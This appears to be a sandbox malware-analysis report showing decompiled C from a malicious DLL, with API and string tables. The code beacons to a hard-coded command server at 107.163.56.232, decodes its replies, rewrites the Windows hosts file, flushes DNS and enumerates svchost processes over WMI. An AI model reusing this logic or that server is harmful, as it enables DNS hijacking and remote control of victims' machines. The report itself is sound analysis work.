            				asm("stosb");
            				__eflags = 0;
            				_t102 = 0x40;
            				_t53 = memset( &_v527, 0, 0 << 2);
            				asm("stosw");
            				E100268BC(_t53,  &_v527 + _t102);
            				asm("stosb");
            				 *_t132( &_v268, 0x104, _t53);
            				 *_t132( &_v528, 0x104);
            				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
            				E1000CD08(0,  &_v268);
            				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
            				_t65 = E1000CCAE(E1000CD08(0,  &_v528), _t94, 0, _t116, 0x104, 0x80000, _t134, __eflags, _t146, 0x80000);
            				_t138 =  &(_t135[0xd]);
            				_t95 = _t65;
            				while(1) {
            					_v1808 = _v1808 & 0x00000000;
            					memset( &_v1807, 0, 0xff << 2);
            					_v784 = _v784 & 0x00000000;
            					asm("stosw");
            					asm("stosb");
            					memset( &_v783, 0, 0 << 2);
            					_t140 =  &(_t138[6]);
            					asm("stosw");
            					asm("stosb");
            					__eflags = E10005C4C( &_v784, 0x100);
            					_t109 = 0x3f;
            					if(__eflags == 0) {
            						_push("http://107.163.56.232:18963/main.php");
            					} else {
            						_push( &_v784);
            					}
            					_push("%s");
            					_push( &_v1808);
            					E10003EF4();
            					_push(0x80000);
            					_push(0);
            					E1000CCFC(_t95, _t109, 0x80000, _t134, __eflags, _t95);
            					_t76 = E100061BD(_t109, 0x80000, __eflags, _t146,  &_v1808, _t95, 0x80000);
            					_t138 =  &(_t140[9]);
            					__eflags = _t76 - 7;
            					_v8 = _t76;
            					if(__eflags > 0) {
            						goto L11;
            					}
            					_push("iOffset");
            					_push("c:\\1.txt");
            					L10004139(_t109, _t116, __eflags, _t146);
            					L10:
            					Sleep( *0x10012500);
            					continue;
            					L11:
            					_t110 = 0;
            					__eflags = _t76;
            					if(_t76 <= 0) {
            						L16:
            						_push(_t95);
            						__eflags = E1000CD02(_t110, 0x80000) - 0x10;
            						if(__eflags <= 0) {
            							wsprintfA(0x10016ae0, "%s", _t95);
            							_v5904 = _v5904 & 0x00000000;
            							memset( &_v5903, 0, 0x3ff << 2);
            							asm("stosw");
            							asm("stosb");
            							E10005318(0, __eflags,  &_v5904);
            							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v268);
            							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v528);
            							_push(_t95);
            							_push(0x10016ae0);
            							E1000CDF2(0x80000);
            							_t138 =  &(_t138[0xd]);
            						}
            						goto L10;
            					} else {
            						goto L12;
            					}
            					do {
            						L12:
            						_t90 = _t110;
            						asm("cdq");
            						_t130 = 2;
            						_t116 = _t90 % _t130;
            						__eflags = _t90 % _t130;
            						if(_t90 % _t130 == 0) {
            							_t32 = _t110 + _t95;
            							 *_t32 =  *(_t110 + _t95) + 0x4b;
            							__eflags =  *_t32;
            						} else {
            							 *(_t110 + _t95) =  *(_t110 + _t95) + 0x3a;
            						}
            						_t110 = _t110 + 1;
            						__eflags = _t110 - _v8;
            					} while (_t110 < _v8);
            					goto L16;
            				}
            			}



































            0x10006ef7
            0x10006efc
            0x10006f09
            0x10006f0b
            0x10006f18
            0x10006f1a
            0x10006f23
            0x10006f35
            0x00000000
            0x10006f35
            0x10006f3d
            0x10006f46
            0x10006f4f
            0x10006f56
            0x10006f58
            0x10006f5a
            0x10006f5d
            0x10006f5f
            0x10006f66
            0x10006f68
            0x10006f6b
            0x10006f70
            0x10006f7e
            0x10006f88
            0x10006f94
            0x10006f9c
            0x10006fab
            0x10006fbe
            0x10006fc3
            0x10006fc6
            0x10006fc8
            0x10006fc8
            0x10006fdc
            0x10006fde
            0x10006fe7
            0x10006fe9
            0x10006ff8
            0x10006ff8
            0x10006ffa
            0x10006ffc
            0x1000700a
            0x1000700c
            0x1000700d
            0x10007018
            0x1000700f
            0x10007015
            0x10007015
            0x10007023
            0x10007028
            0x10007029
            0x10007031
            0x10007032
            0x10007035
            0x10007043
            0x10007048
            0x1000704b
            0x1000704e
            0x10007051
            0x00000000
            0x00000000
            0x10007053
            0x10007058
            0x1000705d
            0x10007064
            0x1000706a
            0x00000000
            0x10007075
            0x10007075
            0x10007077
            0x10007079
            0x10007097
            0x10007097
            0x1000709d
            0x100070a1
            0x100070ae
            0x100070b4
            0x100070c8
            0x100070ca
            0x100070cc
            0x100070d4
            0x100070e7
            0x100070fa
            0x100070ff
            0x10007100
            0x10007105
            0x1000710a
            0x1000710a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x1000707b
            0x1000707b
            0x1000707b
            0x1000707f
            0x10007080
            0x10007081
            0x10007083
            0x10007085
            0x1000708d
            0x1000708d
            0x1000708d
            0x10007087
            0x10007087
            0x10007087
            0x10007091
            0x10007092
            0x10007092
            0x00000000
            0x1000707b

            APIs
            • Sleep.KERNEL32(0000EA60), ref: 10006F35
            • LdrInitializeThunk.NTDLL ref: 10006F9C
            • LdrInitializeThunk.NTDLL ref: 10006FB3
            • Sleep.KERNEL32 ref: 1000706A
            • wsprintfA.USER32 ref: 100070AE
            • PrintFile.ABC(00000000,?,00000000), ref: 100070E7
            • PrintFile.ABC(00000000,?,00000000,?,00000000), ref: 100070FA
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: FileInitializePrintSleepThunk$wsprintf
            • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
            • API String ID: 983772623-1685166179
            • Opcode ID: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
            • Instruction ID: 3d380b1aca1ede5b104bd14f8e69b562dc8f53a9395fdf47d07c0f5b95106c5e
            • Opcode Fuzzy Hash: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
            • Instruction Fuzzy Hash: 2651C8B6D04359AAFB21D774CC45FCF77ACEF08381F2045A6F208E6086DA75AB848E55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E10004D36(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
            				void* _t98;
            				intOrPtr* _t102;
            				intOrPtr _t103;
            				void* _t104;
            				intOrPtr* _t111;
            				intOrPtr* _t113;
            				intOrPtr* _t114;
            				intOrPtr* _t121;
            				intOrPtr* _t123;
            				intOrPtr* _t125;
            				intOrPtr* _t127;
            				intOrPtr* _t139;
            				intOrPtr* _t141;
            				intOrPtr* _t143;
            				intOrPtr* _t145;
            				void* _t146;
            				void* _t148;
            				intOrPtr* _t150;
            				void* _t151;
            				void* _t153;
            				intOrPtr* _t163;
            				signed int _t165;
            				intOrPtr _t173;
            				void* _t206;
            				void* _t214;
            				void* _t215;
            				intOrPtr _t216;
            				intOrPtr* _t217;
            				intOrPtr* _t219;
            				void* _t220;
            				void* _t222;
            				void* _t223;
            				void* _t225;
            
            				_t245 = __fp0;
            				_t227 = __eflags;
            				_t202 = __edi;
            				_t161 = __ecx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				E1000CD20(0x182c, __ecx);
            				 *((intOrPtr*)(_t220 - 0x20)) = 0;
            				_t98 = E1000CCFC(0, _t161, __esi, _t220, _t227, _t220 - 0x48);
            				_t223 = _t222 + 0xc;
            				0x1003a410(0, 0, 0, 0, 0x10, __edi, __esi, __ebx);
            				E1002D3DC(_t98, 0, _t161, __edx, __edi, __esi, _t227, _t220, 0, 0xffffffff, 0, 0, 0);
            				 *((intOrPtr*)(_t220 - 0x1c)) = 0;
            				0x100411b4(E100101A8, 0, 1, E100100D8, _t220 - 0x1c, 3, 0, 0, 0);
            				_push(cs);
            				_push( *((intOrPtr*)(_t220 + 8)));
            				 *((intOrPtr*)(_t220 - 0x18)) = 0;
            				_t102 =  *((intOrPtr*)(E100050A1(0, _t220 + 8, __edx, _t202, __esi, _t227, __fp0)));
            				 *(_t220 - 4) = 0;
            				if(_t102 == 0) {
            					_t103 = 0;
            					__eflags = 0;
            				} else {
            					_t103 =  *_t102;
            				}
            				_t163 =  *((intOrPtr*)(_t220 - 0x1c));
            				_t214 = _t220 - 0x18;
            				_t198 =  *_t163;
            				_t104 =  *((intOrPtr*)( *_t163 + 0xc))(_t163, _t103, 0, 0, 0, 0, 0, 0, _t214);
            				_t164 =  *((intOrPtr*)(_t220 + 8));
            				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            				_t229 =  *((intOrPtr*)(_t220 + 8));
            				if( *((intOrPtr*)(_t220 + 8)) != 0) {
            					E1000515C(_t104, _t164);
            				}
            				0x1003ed69(_t214,  *((intOrPtr*)(_t220 - 0x18)), 0xa, 0, 0, 3, 3, 0, 0);
            				_t215 = L"SELECT * FROM ";
            				_t165 = 7;
            				memcpy(_t220 - 0x838, _t215, _t165 << 2);
            				asm("movsw");
            				_t206 = _t220 - 0x81a;
            				memset(_t206, 0, 0x1ec << 2);
            				_t225 = _t223 + 0x18;
            				_t207 = _t206 + 0x1ec;
            				asm("stosw");
            				 *((intOrPtr*)(_t220 - 0x10)) = 0;
            				0x1003bb02(_t215, _t220 - 0x838,  *((intOrPtr*)(_t220 + 0xc)));
            				_push(_t220 - 0x838);
            				_t111 =  *((intOrPtr*)(E100050A1(0, _t220 - 0x28, _t198, _t206 + 0x1ec, _t215, _t229, _t245)));
            				 *(_t220 - 4) = 1;
            				_t230 = _t111;
            				if(_t111 == 0) {
            					_t216 = 0;
            					__eflags = 0;
            				} else {
            					_t216 =  *_t111;
            				}
            				_push("WQL");
            				_t113 =  *((intOrPtr*)(E1000504D(0, _t220 + 8, _t198, _t207, _t216, _t230, _t245)));
            				 *(_t220 - 4) = 2;
            				if(_t113 == 0) {
            					_t173 = 0;
            					__eflags = 0;
            				} else {
            					_t173 =  *_t113;
            				}
            				_t114 =  *((intOrPtr*)(_t220 - 0x18));
            				_t199 =  *_t114;
            				_t115 =  *((intOrPtr*)( *_t114 + 0x50))(_t114, _t173, _t216, 0x30, 0, _t220 - 0x10);
            				_t174 =  *((intOrPtr*)(_t220 + 8));
            				if( *((intOrPtr*)(_t220 + 8)) != 0) {
            					_t115 = E1000515C(_t115, _t174);
            					 *((intOrPtr*)(_t220 + 8)) = 0;
            				}
            				_t175 =  *((intOrPtr*)(_t220 - 0x28));
            				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            				if( *((intOrPtr*)(_t220 - 0x28)) != 0) {
            					_t115 = E1000515C(_t115, _t175);
            				}
            				 *((intOrPtr*)(_t220 - 0x24)) = 0;
            				if( *((intOrPtr*)(_t220 - 0x10)) == 0) {
            					L32:
            					_pop(_t217);
            					E10025EA7(_t115, 0, _t175, _t199, _t217, _t220, _t243);
            					 *_t217(_t220 - 0x48);
            					 *_t217(_t220 - 0x38);
            					_t121 =  *((intOrPtr*)(_t220 - 0x18));
            					 *((intOrPtr*)( *_t121 + 8))(_t121);
            					_t123 =  *((intOrPtr*)(_t220 - 0x1c));
            					 *((intOrPtr*)( *_t123 + 8))(_t123);
            					_t125 =  *((intOrPtr*)(_t220 - 0x10));
            					 *((intOrPtr*)( *_t125 + 8))(_t125);
            					_t127 =  *((intOrPtr*)(_t220 - 0x14));
            					E10026ED3( *((intOrPtr*)( *_t127 + 8))(_t127), 0,  *_t127, _t199, _t217, _t243);
            					 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
            					return  *((intOrPtr*)(_t220 - 0x20));
            				} else {
            					_t219 =  *0x1000e230;
            					while(1) {
            						_push(_t220 - 0x24);
            						_t175 = _t220 - 0x14;
            						_push(_t220 - 0x14);
            						_push(1);
            						_push(0xffffffff);
            						_push( *((intOrPtr*)(_t220 - 0x10)));
            						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)))) + 0x10))() != 0) {
            							goto L32;
            						}
            						 *_t219(_t220 - 0x48);
            						 *_t219(_t220 - 0x38);
            						 *_t219(_t220 - 0x68);
            						_t139 =  *((intOrPtr*)(_t220 - 0x14));
            						 *((intOrPtr*)(_t220 - 0x30)) = 0;
            						 *((intOrPtr*)( *_t139 + 0x10))(_t139, L"Name", 0, _t220 - 0x48, 0, 0);
            						_t141 =  *((intOrPtr*)(_t220 - 0x14));
            						 *((intOrPtr*)( *_t141 + 0x10))(_t141, L"CommandLine", 0, _t220 - 0x38, 0, 0);
            						_t143 =  *((intOrPtr*)(_t220 - 0x14));
            						_t199 = _t220 - 0x68;
            						_t175 =  *_t143;
            						_t115 =  *((intOrPtr*)( *_t143 + 0x10))(_t143, L"ProcessID", 0, _t220 - 0x68, 0, 0);
            						_t236 =  *((intOrPtr*)(_t220 - 0x30));
            						if( *((intOrPtr*)(_t220 - 0x30)) != 0) {
            							 *(_t220 - 0x58) = 0;
            							_push( *((intOrPtr*)(_t220 - 0x40)));
            							asm("stosd");
            							asm("stosd");
            							asm("stosd");
            							asm("stosw");
            							asm("stosb");
            							_t145 = E100050A1(0, _t220 + 8, _t199, _t220 - 0x57, _t219, _t236, _t245);
            							_t186 =  *_t145;
            							 *(_t220 - 4) = 3;
            							if( *_t145 == 0) {
            								_t146 = 0;
            								__eflags = 0;
            							} else {
            								_t146 = E10005189(_t186, _t199, _t245);
            							}
            							_push(_t146);
            							_t148 = E1000CD0E(_t186, _t220 - 0x58);
            							 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            							_t189 =  *((intOrPtr*)(_t220 + 8));
            							if( *((intOrPtr*)(_t220 + 8)) != 0) {
            								E1000515C(_t148, _t189);
            								 *((intOrPtr*)(_t220 + 8)) = 0;
            							}
            							_t115 = _t220 - 0x58;
            							0x10033fcb(_t115, "svchost.exe");
            							_t239 = _t115;
            							_t175 = _t219;
            							if(_t115 == 0) {
            								 *((char*)(_t220 - 0x1838)) = 0;
            								_push( *((intOrPtr*)(_t220 - 0x30)));
            								memset(_t220 - 0x1837, _t115, 0x3ff << 2);
            								_t225 = _t225 + 0xc;
            								asm("stosw");
            								asm("stosb");
            								_t150 = E100050A1(0, _t220 + 0xc, _t199, _t220 - 0x1837 + 0x3ff, _t219, _t239, _t245);
            								_t194 =  *_t150;
            								 *(_t220 - 4) = 4;
            								if( *_t150 == 0) {
            									_t151 = 0;
            									__eflags = 0;
            								} else {
            									_t151 = E10005189(_t194, _t199, _t245);
            								}
            								_push(_t151);
            								_t153 = E1000CD0E(_t194, _t220 - 0x1838);
            								 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            								_t175 =  *((intOrPtr*)(_t220 + 0xc));
            								if( *((intOrPtr*)(_t220 + 0xc)) != 0) {
            									E1000515C(_t153, _t175);
            									 *((intOrPtr*)(_t220 + 0xc)) = 0;
            								}
            								0x10035299(_t220 - 0x1838, "svchost.exe -k NetworkService");
            								asm("fild dword [ebp-0x74f98b40]");
            								_t220 = _t220 + 1;
            								_t115 =  *0x39e04589;
            							}
            						}
            						_t243 =  *((intOrPtr*)(_t220 - 0x10));
            						if( *((intOrPtr*)(_t220 - 0x10)) != 0) {
            							continue;
            						} else {
            							goto L32;
            						}
            					}
            					goto L32;
            				}
            			}




































            0x10004d36
            0x10004d36
            0x10004d36
            0x10004d36
            0x10004d3b
            0x10004d45
            0x10004d56
            0x10004d59
            0x10004d5e
            0x10004d64
            0x10004d75
            0x10004d7d
            0x10004d8e
            0x10004d93
            0x10004d94
            0x10004d9a
            0x10004da2
            0x10004da4
            0x10004da9
            0x10004daf
            0x10004daf
            0x10004dab
            0x10004dab
            0x10004dab
            0x10004db1
            0x10004db4
            0x10004db9
            0x10004dc2
            0x10004dc5
            0x10004dc8
            0x10004dcc
            0x10004dce
            0x10004dd0
            0x10004dd0
            0x10004de3
            0x10004dea
            0x10004def
            0x10004df6
            0x10004df8
            0x10004e01
            0x10004e0a
            0x10004e0a
            0x10004e0a
            0x10004e0c
            0x10004e14
            0x10004e19
            0x10004e26
            0x10004e2f
            0x10004e31
            0x10004e38
            0x10004e3a
            0x10004e40
            0x10004e40
            0x10004e3c
            0x10004e3c
            0x10004e3c
            0x10004e42
            0x10004e4f
            0x10004e51
            0x10004e57
            0x10004e5d
            0x10004e5d
            0x10004e59
            0x10004e59
            0x10004e59
            0x10004e5f
            0x10004e67
            0x10004e6e
            0x10004e71
            0x10004e76
            0x10004e78
            0x10004e7d
            0x10004e7d
            0x10004e80
            0x10004e83
            0x10004e89
            0x10004e8b
            0x10004e8b
            0x10004e93
            0x10004e96
            0x10004fff
            0x10004fff
            0x10005000
            0x10005009
            0x1000500f
            0x10005011
            0x10005017
            0x1000501a
            0x10005020
            0x10005023
            0x10005029
            0x1000502c
            0x10005035
            0x10005044
            0x1000504c
            0x10004e9c
            0x10004e9c
            0x10004ea2
            0x10004ea8
            0x10004ea9
            0x10004eae
            0x10004eaf
            0x10004eb1
            0x10004eb3
            0x10004ebb
            0x00000000
            0x00000000
            0x10004ec5
            0x10004ecb
            0x10004ed1
            0x10004ed3
            0x10004edc
            0x10004ee8
            0x10004eeb
            0x10004efd
            0x10004f00
            0x10004f04
            0x10004f08
            0x10004f12
            0x10004f15
            0x10004f18
            0x10004f23
            0x10004f26
            0x10004f29
            0x10004f2a
            0x10004f2b
            0x10004f2c
            0x10004f31
            0x10004f32
            0x10004f37
            0x10004f39
            0x10004f42
            0x10004f4b
            0x10004f4b
            0x10004f44
            0x10004f44
            0x10004f44
            0x10004f4d
            0x10004f52
            0x10004f57
            0x10004f5d
            0x10004f62
            0x10004f64
            0x10004f69
            0x10004f69
            0x10004f6c
            0x10004f76
            0x10004f7c
            0x10004f7e
            0x10004f7f
            0x10004f8c
            0x10004f92
            0x10004f95
            0x10004f95
            0x10004f97
            0x10004f9c
            0x10004f9d
            0x10004fa2
            0x10004fa4
            0x10004fad
            0x10004fb6
            0x10004fb6
            0x10004faf
            0x10004faf
            0x10004faf
            0x10004fb8
            0x10004fc0
            0x10004fc5
            0x10004fcb
            0x10004fd0
            0x10004fd2
            0x10004fd7
            0x10004fd7
            0x10004fe6
            0x10004feb
            0x10004ff1
            0x10004ff2
            0x10004ff2
            0x10004f7f
            0x10004ff6
            0x10004ff9
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x10004ff9
            0x00000000
            0x10004ea2

            APIs
            • VariantInit.OLEAUT32(00000000), ref: 10004EC5
            • VariantInit.OLEAUT32(?), ref: 10004ECB
            • VariantInit.OLEAUT32(000000FF), ref: 10004ED1
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
            • API String ID: 1927566239-2685825574
            • Opcode ID: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
            • Instruction ID: 685215bc3e39be9e7018d3cf9a0ce008db6110164ca837be315af6ad884bf42e
            • Opcode Fuzzy Hash: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
            • Instruction Fuzzy Hash: 7AA15BB5900209AFEB04DF94CC81DEEBBBCEF48394F104569F615AB295CB31AE45CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E1000827D() {
            				signed int _v8;
            				void _v267;
            				signed char _v268;
            				void _v527;
            				signed char _v528;
            				char _v783;
            				signed char _v784;
            				void _v1807;
            				signed char _v1808;
            				void* _t50;
            				void* _t56;
            				signed int _t61;
            				signed int _t67;
            				void* _t70;
            				void* _t71;
            				signed int _t72;
            				void* _t78;
            				void* _t81;
            				signed int _t82;
            				void* _t83;
            				void* _t94;
            				signed int _t95;
            				intOrPtr* _t96;
            				void* _t98;
            				void* _t99;
            				void* _t102;
            				void* _t104;
            				void* _t109;
            
            				_v268 = _v268 & 0x00000000;
            				_t72 = 0x40;
            				memset( &_v267, 0, _t72 << 2);
            				_v528 = _v528 & 0x00000000;
            				asm("stosw");
            				asm("stosb");
            				memset( &_v527, E1002ED85(_t96, _t98), 0 << 2);
            				asm("stosw");
            				asm("stosb");
            				 *_t96( &_v268, 0x104, _t98, 0x40);
            				 *_t96( &_v528, 0x104);
            				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
            				E1000CD08(0,  &_v268);
            				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
            				_t50 = E1000CCAE(E1000CD08(0,  &_v528), _t70, 0, _t86, 0x104, 0x80000, _t98, 0, _t109, 0x80000);
            				_t102 = _t99 + 0x34;
            				_t71 = _t50;
            				while(1) {
            					_v1808 = _v1808 & 0x00000000;
            					memset( &_v1807, 0, 0xff << 2);
            					_v784 = _v784 & 0x00000000;
            					asm("stosw");
            					asm("stosb");
            					_t78 = 0x3f;
            					_t94 =  &_v783;
            					memset(_t94, 0, 0 << 2);
            					_t104 = _t102 + 0x18;
            					_t95 = _t94 + _t78;
            					asm("stosw");
            					asm("stosb");
            					_t56 = E10005C4C( &_v784, 0x100);
            					_t107 = _t56;
            					_pop(_t81);
            					if(_t56 == 0) {
            						_push("http://107.163.56.232:18963/main.php");
            					} else {
            						_push( &_v784);
            					}
            					_push("%s");
            					_push( &_v1808);
            					E10003EF4();
            					_push(0x80000);
            					_push(0);
            					E1000CCFC(_t71, _t81, 0x80000, _t98, _t107, _t71);
            					_t61 = E100061BD(_t81, 0x80000, _t107, _t109,  &_v1808, _t71, 0x80000);
            					_t102 = _t104 + 0x24;
            					_v8 = _t61;
            					if(_t61 > 7) {
            						goto L6;
            					}
            					L5:
            					Sleep( *0x10012500);
            					continue;
            					L6:
            					_t82 = 0;
            					__eflags = _t61;
            					if(_t61 <= 0) {
            						L11:
            						__eflags = E1000CD02(_t82, 0x80000) - 0x10;
            						_t83 = _t71;
            						if(__eflags <= 0) {
            							_t95 = 0x10016ae0;
            							_push(_t71);
            							__eflags = E1000CDF2(0x80000);
            							_t83 = 0x10016ae0;
            							if(__eflags != 0) {
            								wsprintfA(0x10016ae0, "%s", _t71);
            								_t102 = _t102 + 0xc;
            							}
            						}
            						E1000721F(_t71, _t83, _t86, _t95, 0x80000, __eflags, _t109);
            						_t102 = _t102 + 0xc;
            						0x1004303b(0x80000, E10001000(_t83, __eflags, _t109, "Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM="), 0, 0, "127.0.0.1", "8.8.8.8");
            						goto L5;
            					} else {
            						goto L7;
            					}
            					do {
            						L7:
            						_t67 = _t82;
            						asm("cdq");
            						_t95 = 2;
            						_t86 = _t67 % _t95;
            						__eflags = _t67 % _t95;
            						if(_t67 % _t95 == 0) {
            							_t32 = _t82 + _t71;
            							 *_t32 =  *(_t82 + _t71) + 0x4b;
            							__eflags =  *_t32;
            						} else {
            							 *(_t82 + _t71) =  *(_t82 + _t71) + 0x3a;
            						}
            						_t82 = _t82 + 1;
            						__eflags = _t82 - _v8;
            					} while (_t82 < _v8);
            					goto L11;
            				}
            			}































            0x10008286
            0x10008294
            0x1000829b
            0x1000829d
            0x100082a6
            0x100082a8
            0x100082b8
            0x100082ba
            0x100082bc
            0x100082ca
            0x100082d4
            0x100082e0
            0x100082e8
            0x100082f7
            0x1000830a
            0x1000830f
            0x10008312
            0x10008314
            0x10008314
            0x10008328
            0x1000832a
            0x10008333
            0x10008335
            0x10008336
            0x10008339
            0x10008344
            0x10008344
            0x10008344
            0x10008346
            0x10008348
            0x10008350
            0x10008356
            0x10008358
            0x10008359
            0x10008364
            0x1000835b
            0x10008361
            0x10008361
            0x1000836f
            0x10008374
            0x10008375
            0x1000837d
            0x1000837e
            0x10008381
            0x1000838f
            0x10008394
            0x1000839a
            0x1000839d
            0x00000000
            0x00000000
            0x1000839f
            0x100083a5
            0x00000000
            0x100083b0
            0x100083b0
            0x100083b2
            0x100083b4
            0x100083d2
            0x100083d8
            0x100083db
            0x100083dc
            0x100083de
            0x100083e3
            0x100083eb
            0x100083ed
            0x100083ee
            0x100083f7
            0x100083fd
            0x100083fd
            0x100083ee
            0x1000840c
            0x10008411
            0x10008423
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x100083b6
            0x100083b6
            0x100083b6
            0x100083ba
            0x100083bb
            0x100083bc
            0x100083be
            0x100083c0
            0x100083c8
            0x100083c8
            0x100083c8
            0x100083c2
            0x100083c2
            0x100083c2
            0x100083cc
            0x100083cd
            0x100083cd
            0x00000000
            0x100083b6

            APIs
            • LdrInitializeThunk.NTDLL ref: 100082E8
            • LdrInitializeThunk.NTDLL ref: 100082FF
            • Sleep.KERNEL32(00080000,00000000,00000000), ref: 100083A5
            • wsprintfA.USER32 ref: 100083F7
            Strings
            • 8.8.8.8, xrefs: 10008400
            • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082ED
            • 127.0.0.1, xrefs: 10008405
            • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082D6
            • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008416
            • http://107.163.56.232:18963/main.php, xrefs: 10008364
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk$Sleepwsprintf
            • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
            • API String ID: 2795264321-515792873
            • Opcode ID: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
            • Instruction ID: 307e7fa5ef9b1f310a37dbdaab843115ee1a86e3901deb50f67a69e2b05b1656
            • Opcode Fuzzy Hash: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
            • Instruction Fuzzy Hash: 394106B6D042597AF721D364CC46FCB7B6CEB443C0F2040A5F248B9086DAB4BB858F55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 56%
            			E1000570F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
            				void _v67;
            				char _v68;
            				void _v327;
            				char _v328;
            				char _v587;
            				char _v588;
            				void _v4683;
            				signed char _v4684;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t47;
            				void* _t48;
            				void* _t49;
            				signed int _t52;
            				signed int _t56;
            				void* _t58;
            				void* _t67;
            				void* _t71;
            				void* _t79;
            
            				_t79 = __eflags;
            				_t60 = __edx;
            				_t51 = __ecx;
            				E1000CD20(0x1248, __ecx);
            				E100051D3(_t51, __edx, _t79, __fp0);
            				_v68 = _v68 & 0x00000000;
            				_t52 = 0xf;
            				memset( &_v67, 0, _t52 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v68, "%s\\%s", 0x100165a4, 0x100165a8);
            				_v4684 = _v4684 & 0x00000000;
            				memset( &_v4683, 0, 0x3ff << 2);
            				asm("stosw");
            				asm("stosb");
            				E10005318(0, _t79,  &_v4684);
            				_v328 = _v328 & 0x00000000;
            				_t56 = 0x40;
            				_v588 = _v588 & 0x00000000;
